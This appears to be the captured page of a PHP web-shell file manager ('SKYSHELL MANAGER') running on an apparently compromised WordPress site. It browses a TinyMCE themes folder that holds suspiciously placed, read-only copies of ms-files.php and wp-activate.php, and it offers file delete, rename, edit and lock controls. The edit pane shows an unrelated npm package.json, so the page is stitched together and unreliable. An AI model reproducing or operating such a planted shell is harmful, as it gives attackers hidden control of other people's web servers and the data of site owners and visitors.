📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "@istanbuljs/schema", "version": "0.1.3", "description": "Schemas describing various structures used by nyc and istanbuljs", "main": "index.js", "scripts": { "release": "standard-version --sign", "pretest": "xo", "test": "tap", "snap": "npm test -- --snapshot" }, "engines": { "node": ">=8" }, "author": "Corey Farrell", "license": "MIT", "repository": { "type": "git", "url": "git+https://github.com/istanbuljs/schema.git" }, "bugs": { "url": "https://github.com/istanbuljs/schema/issues" }, "homepage": "https://github.com/istanbuljs/schema#readme", "devDependencies": { "standard-version": "^7.0.0", "tap": "^14.6.7", "xo": "^0.25.3" } }
Save